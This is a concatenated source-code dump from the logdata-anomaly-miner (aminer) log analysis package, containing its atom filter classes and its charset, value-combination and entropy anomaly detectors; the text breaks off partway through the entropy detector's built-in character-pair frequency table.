rule.match(log_atom): self.log_success += 1 return True original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary()), 'AffectedLogAtomValues': [data]} sorted_log_lines = [original_log_line_prefix + data] event_data['AnalysisComponent'] = analysis_component for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'No allowlisting for current atom', sorted_log_lines, event_data, log_atom, self) return False def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ super().log_statistics(component_name) for i, rule in enumerate(self.allowlist_rules): rule.log_statistics(component_name + '.' + rule.__class__.__name__ + str(i)) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/AtomFilters.py000066400000000000000000000130621437606560100336370ustar00rootroot00000000000000""" This file collects various classes useful to filter log atoms and pass them to different handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface class SubhandlerFilter(AtomHandlerInterface): """Handlers of this class pass the received atoms to a list of atom handlers.""" def __init__(self, subhandler_list, stop_when_handled_flag=False): """ @param subhandler_list a list of objects implementing the AtomHandlerInterface which are run until the end, if stop_when_handled_flag is False or until an atom handler can handle the log atom. @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom. """ super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) def add_handler(self, atom_handler, stop_when_handled_flag=False): """ Add a handler to the list of handlers. @param atom_handler an object implementing the AtomHandlerInterface. @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom. """ self.subhandler_list.append((atom_handler, stop_when_handled_flag)) def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. @return False when no subhandler was able to handle the atom. """ result = False self.log_total += 1 for handler, stop_when_handled_flag in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True self.log_success += 1 if stop_when_handled_flag: break return result class MatchPathFilter(AtomHandlerInterface): """This class just splits incoming matches according to existence of paths in the match.""" def __init__(self, parsed_atom_handler_lookup_list, default_parsed_atom_handler=None): """ Initialize the filter. @param parsed_atom_handler_lookup_list contains tuples with search path string and handler. When the handler is None, the filter will just drop a received atom without forwarding. @param default_parsed_atom_handler invoke this handler when no handler was found for given match path or do not invoke any handler when None. """ super().__init__( parsed_atom_handler_lookup_list=parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) def receive_atom(self, log_atom): """ Receive a parsed atom and the information about the parser match. @return False when log_atom did not contain match data or was not forwarded to any handler, True otherwise. """ self.log_total += 1 if log_atom.parser_match is None: return False match_dict = log_atom.parser_match.get_match_dictionary() for path_name, target_handler in self.parsed_atom_handler_lookup_list: if path_name in match_dict: if target_handler is not None: target_handler.receive_atom(log_atom) self.log_success += 1 return True if self.default_parsed_atom_handler is None: return False self.default_parsed_atom_handler.receive_atom(log_atom) self.log_success += 1 return True class MatchValueFilter(AtomHandlerInterface): """This class just splits incoming matches using a given match value and forward them to different handlers.""" def __init__(self, target_path, parsed_atom_handler_dict, default_parsed_atom_handler=None): """ Initialize the splitter. @param target_path the path to be analyzed in the parser match of the log atom. @param parsed_atom_handler_dict a dictionary of match value to atom handler. @param default_parsed_atom_handler invoke this default handler when no value handler was found or do not invoke any handler when None. """ super().__init__(target_path=target_path, parsed_atom_handler_dict=parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 if log_atom.parser_match is None: return False target_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if target_value is not None: target_value = target_value.match_object target_handler = self.parsed_atom_handler_dict.get(target_value, self.default_parsed_atom_handler) if target_handler is None: return False target_handler.receive_atom(log_atom) self.log_success += 1 return True CharsetDetector.py000066400000000000000000000304731437606560100344170ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for value character sets. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import time from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, KEY_PERSISTENCE_PERIOD,\ DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class CharsetDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list, target_path_list=None, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list specifies group identifiers for which data should be learned/analyzed. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence file. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["id_path_list", "target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, learn_mode=learn_mode, id_path_list=id_path_list, persistence_id=persistence_id, stop_learning_time=stop_learning_time, output_logline=output_logline, ignore_list=ignore_list, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, target_path_list=target_path_list, constraint_list=constraint_list ) # Persisted data stores characters as bytes for each id, i.e., [[[], []], ...]] self.charsets = {} self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for lst in persistence_data: self.charsets[tuple(lst[0])] = set(lst[1]) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return # Store all values from target paths in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if value is not None: all_values_none = False values.append(value) if all_values_none is True: return # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = tuple(id_vals) # Check if one of the values has new characters for a specific id path. if id_event in self.charsets: missing_chars = set() for c in b''.join(values): if c not in self.charsets[id_event]: missing_chars.add(c) if len(missing_chars) > 0: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] missing_chars_decoded = [] for character in missing_chars: missing_chars_decoded.append(character.to_bytes(1, 'big').decode(AminerConfig.ENCODING)) affected_values = [] for value in values: affected_values.append(value.decode(AminerConfig.ENCODING)) analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': affected_values, 'MissingCharacters': missing_chars_decoded} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New character(s) detected', sorted_log_lines, event_data, log_atom, self) # Extend charsets if learn mode is active. if self.learn_mode: self.charsets[id_event].update(missing_chars) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: self.charsets[id_event] = set(b''.join(values)) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" lst = [] for id_ev, charset in self.charsets.items(): lst.append([id_ev, list(charset)]) PersistenceUtil.store_json(self.persistence_file_name, lst) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EnhancedNewMatchPathValueComboDetector.py000066400000000000000000000266161437606560100407600ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file defines the EnhancedNewMatchPathValueComboDetector. detector to extract values from LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import os import logging from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.util import PersistenceUtil from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME,\ CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class EnhancedNewMatchPathValueComboDetector(NewMatchPathValueComboDetector): """ This class creates events when a new value combination for a given list of match data paths were found. It is similar to the NewMatchPathValueComboDetector basic detector but also provides support for storing meta information about each detected value combination, e.g. * the first time a tuple was detected using the LogAtom default timestamp. * the last time a tuple was seen * the number of times the tuple was seen * user data for annotation. Due to the additional features, this detector is slower than the basic detector. """ def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', allow_missing_values_flag=False, learn_mode=False, tuple_transformation_function=None, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param target_path_list the list of values to extract from each match to create the value combination to be checked. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param tuple_transformation_function when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.known_values_dict = {} self.tuple_transformation_function = tuple_transformation_function super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time) self.date_string = "%Y-%m-%d %H:%M:%S" self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Dictionary and tuples were stored as list of lists. Transform # the first lists to tuples to allow hash operation needed by set. for value_tuple, extra_data in persistence_data: self.known_values_dict[tuple(value_tuple)] = extra_data logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """ Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() timestamp = round(timestamp, 3) match_value_list = [] for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: if not self.allow_missing_values_flag: return False match_value_list.append(None) else: matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match_element in matches: match_value_list.append(match_element.match_object) if self.tuple_transformation_function is not None: match_value_list = self.tuple_transformation_function(match_value_list) match_value_tuple = tuple(match_value_list) if self.known_values_dict.get(match_value_tuple) is None: self.known_values_dict[match_value_tuple] = [timestamp, timestamp, 1] self.log_new_learned_values.append(match_value_tuple) else: extra_data = self.known_values_dict.get(match_value_tuple) extra_data[1] = timestamp extra_data[2] += 1 affected_log_atom_values = [] metadata = {} for match_value in list(match_value_tuple): if isinstance(match_value, bytes): match_value = match_value.decode(AminerConfig.ENCODING) affected_log_atom_values.append(str(match_value)) values = self.known_values_dict.get(match_value_tuple) metadata['TimeFirstOccurrence'] = values[0] metadata['TimeLastOccurrence'] = values[1] metadata['NumberOfOccurrences'] = values[2] analysis_component = {'AffectedLogAtomPaths': self.target_path_list, 'AffectedLogAtomValues': affected_log_atom_values, 'Metadata': metadata} event_data = {'AnalysisComponent': analysis_component} if (self.learn_mode and self.known_values_dict.get(match_value_tuple)[2] == 1) or not self.learn_mode: self.log_learned_path_value_combos += 1 try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) for listener in self.anomaly_event_handlers: sorted_log_lines = [str(self.known_values_dict) + os.linesep + original_log_line_prefix + data] listener.receive_event(f'Analysis.{self.__class__.__name__}', 'New value combination(s) detected', sorted_log_lines, event_data, log_atom, self) if self.learn_mode and self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [] for dict_record in self.known_values_dict.items(): persistence_data.append(dict_record) PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) current_timestamp = event_data[0] self.known_values_dict[event_data[1]] = [current_timestamp, current_timestamp, 1] return f"Allowlisted path(es) {', '.join(self.target_path_list)} with {event_data}." def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] EntropyDetector.py000066400000000000000000001401251437606560100344620ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an detector for character pair probabilities in values. The idea is based on freq.py (https://github.com/markbaggett/freq) by Mark Baggett. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import time from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX,\ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EntropyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """This class creates events when character pairs with low probabilities occur in values.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, prob_thresh=0.05, default_freqs=False, skip_repetitions=False, persistence_id='Default', learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same path. @param prob_thresh limit for the average probability of character pairs for which anomalies are reported. @param default_freqs initializes the probabilities with default values from https://github.com/markbaggett/freq. @param skip_repetitions boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run. @param persistence_id name of persistence file. @param learn_mode when set to True, the detector will extend the table of character pair frequencies based on new values. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, prob_thresh=prob_thresh, skip_repetitions=skip_repetitions, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) self.value_set = set() self.freq = {} if default_freqs is True: # Default probabilities taken from https://github.com/markbaggett/freq default_f = [True, "\n\t~`!@#$%^&*()_+-", [["\f", [["f", 2]]], [" ", [[" ", 312527], ["$", 12], ["(", 1520], [",", 6], ["0", 2], ["4", 210], ["8", 75], ["<", 58], ["D", 5449], ["H", 14898], ["L", 6849], ["P", 10276], ["T", 23773], ["X", 290], ["`", 1958], ["d", 74474], ["h", 195782], ["l", 64742], ["p", 65902], ["t", 408490], ["x", 22], ["|", 38], ["#", 6], ["'", 3062], ["+", 2], ["/", 12], ["3", 300], ["7", 134], [";", 8], ["?", 8], ["C", 9334], ["G", 5688], ["K", 2484], ["O", 4266], ["S", 13139], ["W", 9355], ["[", 408], ["_", 220], ["c", 90632], ["g", 44086], ["k", 13940], ["o", 161371], ["s", 182472], ["w", 187994], ["{", 8], ["\"", 22346], ["&", 42], ["*", 112], [".", 2358], ["2", 691], ["6", 180], [":", 14], [">", 2], ["B", 12213], ["F", 8428], ["J", 5957], ["N", 7370], ["R", 5046], ["V", 3389], ["Z", 250], ["b", 109654], ["f", 95818], ["j", 6186], ["n", 56010], ["r", 54486], ["v", 15242], ["z", 238], ["~", 2], ["%", 2], [")", 2], ["-", 550], ["1", 1613], ["5", 132], ["9", 74], ["A", 16635], ["E", 4590], ["I", 45393], ["M", 17353], ["Q", 356], ["U", 753], ["Y", 2574], ["a", 293192], ["e", 47200], ["i", 125201], ["m", 99016], ["q", 5914], ["u", 27850], ["y", 29288]]], ["$", [[" ", 2], ["3", 2], ["2", 6], ["4", 10]]], ["(", [[" ", 2], ["\"", 34], ["$", 12], ["'", 24], ["*", 8], ["1", 28], ["3", 24], ["2", 30], ["5", 2], ["A", 54], ["C", 12], ["B", 32], ["E", 12], ["D", 16], ["G", 6], ["F", 40], ["I", 120], ["H", 48], ["K", 10], ["J", 2], ["M", 48], ["L", 14], ["O", 20], ["N", 26], ["P", 26], ["S", 46], ["U", 8], ["T", 124], ["W", 38], ["V", 2], ["Y", 4], ["_", 14], ["a", 306], ["`", 2], ["c", 22], ["b", 50], ["e", 24], ["d", 18], ["g", 10], ["f", 80], ["i", 122], ["h", 102], ["k", 2], ["j", 2], ["m", 20], ["l", 20], ["o", 86], ["n", 38], ["p", 16], ["s", 106], ["r", 6], ["u", 6], ["t", 240], ["w", 212], ["v", 2], ["y", 6], ["~", 8]]], [",", [["!", 2], [" ", 200706], ["\"", 10148], ["'", 1656], [")", 4], ["*", 18], ["-", 780], [",", 10], ["1", 40], ["0", 263], ["3", 6], ["2", 42], ["5", 44], ["4", 28], ["7", 4], ["6", 20], ["9", 12], ["8", 18], [":", 4], ["A", 4], ["I", 42], ["J", 2], ["M", 2], ["T", 2], ["[", 2], ["a", 328], ["c", 8], ["b", 76], ["e", 6], ["d", 4], ["g", 10], ["f", 60], ["i", 36], ["h", 36], ["k", 6], ["m", 10], ["l", 6], ["o", 22], ["n", 8], ["q", 2], ["p", 2], ["s", 64], ["r", 8], ["t", 84], ["w", 70]]], ["0", [[" ", 512], ["%", 16], ["'", 14], [")", 20], ["-", 20], [",", 155], [".", 70], ["1", 38], ["0", 714], ["3", 17], ["2", 32], ["5", 34], ["4", 13], ["7", 30], ["6", 21], ["9", 34], ["8", 20], [";", 8], [":", 22], ["@", 20], ["I", 6], ["]", 46], ["m", 2], ["s", 6], ["t", 74], ["x", 10], ["}", 18]]], ["4", [[" ", 70], ["'", 4], [")", 2], ["-", 12], [",", 70], [".", 46], ["1", 24], ["0", 82], ["3", 24], ["2", 24], ["5", 34], ["4", 16], ["7", 28], ["6", 16], ["9", 24], ["8", 34], [";", 6], [":", 44], ["@", 8], ["T", 2], ["]", 60], ["t", 64], ["}", 18], ["|", 32]]], ["8", [[" ", 64], ["'", 6], ["-", 12], [",", 68], [".", 28], ["1", 192], ["0", 155], ["3", 132], ["2", 89], ["5", 26], ["4", 56], ["7", 26], ["6", 74], ["9", 37], ["8", 12], [";", 12], [":", 14], ["?", 2], ["@", 10], ["]", 54], ["m", 2], ["t", 56], ["}", 18], ["|", 44]]], ["<", [["A", 64], ["C", 132], ["B", 10], ["E", 18], ["D", 14], ["G", 4], ["F", 20], ["I", 14], ["H", 94], ["K", 2], ["M", 14], ["L", 8], ["O", 14], ["N", 2], ["P", 14], ["S", 14], ["R", 10], ["T", 224], ["W", 24], ["Y", 2], ["m", 2], ["s", 2]]], ["@", [[" ", 102], ["c", 8], ["e", 14], [",", 8], [".", 8], ["u", 6], ["v", 16]]], ["D", [["!", 4], [" ", 358], ["'", 72], ["*", 16], ["-", 64], [",", 14], [".", 66], [";", 2], ["?", 2], ["A", 93], ["C", 2], ["E", 240], ["D", 2], ["G", 10], ["F", 8], ["I", 220], ["M", 2], ["L", 2], ["O", 89], ["N", 14], ["P", 2], ["S", 28], ["R", 70], ["U", 24], ["V", 2], ["Y", 12], ["a", 1027], ["e", 2124], ["i", 779], ["j", 6], ["m", 148], ["o", 2366], ["n", 8], ["r", 642], ["u", 914], ["w", 4], ["y", 20]]], ["H", [[" ", 112], ["'", 14], [",", 8], [".", 210], ["1", 126], ["3", 42], ["2", 54], ["5", 12], ["4", 12], ["7", 12], ["6", 12], ["9", 12], ["8", 12], ["?", 2], ["A", 410], ["E", 722], ["F", 4], ["I", 298], ["M", 4], ["O", 260], ["N", 2], ["Q", 4], ["S", 6], ["R", 20], ["U", 26], ["T", 60], ["Y", 20], ["a", 2890], ["e", 16114], ["i", 2886], ["h", 2], ["m", 2], ["o", 2880], ["s", 4], ["u", 596], ["v", 2], ["y", 24]]], ["L", [["!", 2], [" ", 102], ["'", 40], [")", 2], ["-", 4], [",", 10], [".", 40], ["1", 6], ["2", 8], ["5", 2], ["4", 2], ["6", 2], ["8", 2], [":", 8], ["A", 120], ["C", 14], ["E", 261], ["D", 38], ["G", 14], ["F", 26], ["I", 210], ["H", 4], ["K", 46], ["J", 2], ["M", 6], ["L", 134], ["O", 98], ["N", 2], ["P", 4], ["S", 36], ["R", 6], ["U", 84], ["T", 12], ["W", 2], ["Y", 32], ["a", 2534], ["e", 1957], ["i", 1482], ["h", 70], ["l", 2], ["o", 2216], ["u", 614], ["w", 2], ["y", 30]]], ["P", [["!", 2], [" ", 30], ["-", 4], [".", 72], ["A", 198], ["E", 228], ["G", 8], ["I", 66], ["H", 24], ["K", 2], ["M", 8], ["L", 90], ["O", 110], ["P", 26], ["S", 18], ["R", 198], ["U", 54], ["T", 202], ["Y", 10], ["a", 2387], ["e", 1866], ["f", 50], ["i", 2690], ["h", 472], ["l", 486], ["o", 1094], ["s", 84], ["r", 4898], ["u", 314], ["t", 12], ["w", 